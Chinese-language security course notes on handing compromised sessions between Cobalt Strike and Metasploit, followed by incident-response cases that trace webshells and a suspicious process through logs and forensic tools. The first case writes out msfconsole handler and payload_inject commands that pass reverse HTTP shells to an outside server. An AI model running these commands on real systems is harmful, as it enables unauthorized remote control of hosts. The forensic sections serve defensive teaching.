72：内网安全-域横向CS&MSF联动及应急响应初识

思维导图1-权限维持

• 时间原因，权限维持内容本课不再讲解，后期有时间的话会补充。而且权限维持属于渗透后期的知识，关键还是前面的内容，多实践，多总结。

思维导图2-应急响应

本课重点：

• 案例1：MSF&CobaltStrike联动Shell
• 案例2：WEB攻击应急响应朔源-后门,日志
• 案例3：WIN系统攻击应急响应朔源-后门,日志,流量

案例1：MSF&CobaltStrike联动Shell

为什么要进行联动？因为cs和msf经常相互调用，有一些功能cs强一点，有一些可能msf强一点，所以在渗透测试的时候经常要切换！所以我们需要学习如何在cs、msf、powershell之间进行会话委派。powershell本身用处少，而且很多正式环境上的powershell默认执行策略是关闭的，总的来说有的鸡肋，所以这里就不再讲了。

CS->MSF
创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器
MSF->CS
CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线
use exploit/windows/local/payload_inject

环境准备：2台外网服务器（分别部署msf和cs）和一台webserver服务器、一台本地主机。在webserver和本地主机执行木马，实现域内主机上线，先将会话从cs移交到msf，再从msf移交到cs，实现互相切换。

案例演示1-cs移交到msf

<1>启动cs，在在webserver和本地主机执行木马，实现webserver和本地主机上线。

<2>CS上，创建Foreign监听器

<3>MSF监听模块设置对应地址端口

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http #这个payload要跟CS设置的payload保持一致
set lhost 0.0.0.0 #不设置也行 
set lport 4444 #端口需要与cs监听器端口保持一致 
exploit

<4>CS执行Spawn选择监听器。具体步骤：右击本地主机图标-->spawn（权利委派）-->选择msf监听器，如果想要msf接管webserver主机权限，就先右击webserver主机图标

<5>等待一会儿，msf接收到会话。如果一直没有反弹结果，可能就是网络问题，此时就要看看接管主机类型了（如果是虚拟机，一般没什么问题。但是阿里云服务器上面有个端口问题，要开启4444端口，还可以右键session——sleep设1试试）

案例演示2-msf移交到cs

<1>CS创建监听器

<2>MSF载入新模块注入设置对应地址端口

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http #这个payload要跟CS监听器设置的payload保持一致
set lport 5566 #端口需要与cs监听器端口保持一致 
set lhost 101.37.160.211 # IP设置为msf本地IP，与CS设置保持一致
set session 4 #上面第<5>步生成的session就是4
exploit

<3>等待一会儿，会话4的shell就反弹到CS上面了

案例2：WEB攻击应急响应溯源-后门,日志

故事回顾：某客户反映自己的网站首页出现篡改，请求支援
分析：涉及的攻击面，涉及的操作权限，涉及的攻击意图，涉及的攻击方式等
思路1：利用日志定位修改时间基数，将前时间进行攻击分析，后时间进行操作分析
思路2：利用后门webshell查杀脚本或工具找到对应后门文件，定位第一次时间分析

站在攻击者的角度，去分析。攻击者当前拿到哪些权限，网站还是系统权限。装没装杀软，用渗透者的思路去想问题。注重信息搜集，从攻击面入手查看应急响应。

案例演示

<1>执行netstat -ano命令，通过开放的端口找到对应的PID。

<2>执行tasklist -svc命令，通过PID找到对应的进程名称。

<3>在任务管理器，右击进程名称，选择打开文件位置。

直接定位到具体位置

<4>根据不同的服务名，找寻对应的日志存储目录。

<5>打开日志，分析异常操作，发现有人上传了x.php文件。

<6>通过网站目录找到x.php

<7>打开看一下，是后门文件。

<8>还可以去网站目录查看首页修改时间，查找网站相关日志，定位修改时间基数，将该时间之前的日志进行攻击分析（分析攻击者是如何修改首页内容的），该时间之后的日志进行操作分析（分析攻击者修改网页之后还进行了什么操作，是否留有后门等）

<9>利用后门webshell查杀脚本或工具找到对应后门文件，网上有很多查杀工具，比如D盾_Web查杀、百度WEBDIR+、河马、Sangfor WebShellKill、深度学习模型检测PHP Webshell、PHP Malware Finder、在线webshell查杀工具等。参考：https://blog.csdn.net/qq_25645753/article/details/110196602

比如使用河马查杀，安装之后，扫描，发现两个后门。然后去日志搜索相关关键字，找到是谁访问了这个后门，如何操作等。

案例3：WIN系统攻击应急溯源-后门,日志,流量

分析：涉及的攻击面，涉及的操作权限，涉及的攻击意图，涉及的攻击方式等
故事回顾：某客户反映服务器出现卡顿等情况，请求支援
思路：利用监控工具分析可疑进程，利用杀毒软件分析可疑文件，利用接口工具抓流量
获取进监控：PCHunter64
获取执行列表：UserAssistView
UserAssistView下载：https://www.onlinedown.net/soft/628964.htm
AppCompatCacheParser.exe --csv c:\temp -t

案例演示

<1>打开PCHunter64工具，查看正在运行的进程，发现异常进程artifact.exe（名字不熟悉，没有厂商信息等）

<2>在网络模块，发现该进程与外部IP地址进行网络连接，很可疑。

<3>PCHunter64工具还有很多其他功能，可以进一步分析该进程是否是后门或者勒索病毒等。

<4>UserAssistView工具可以看到windows系统所有文件的执行时间记录，比如我们可以查看一下artifact.exe上次修改的时间。说明在这个时间点前后攻击者一定对系统进行了一些操作，相应地，我们就可以以此时间为基数，定位查找日志将该时间之前的日志进行攻击分析（分析攻击者是如何攻击服务器的），该时间之后的日志进行操作分析（分析攻击者登录服务器后进行了什么操作)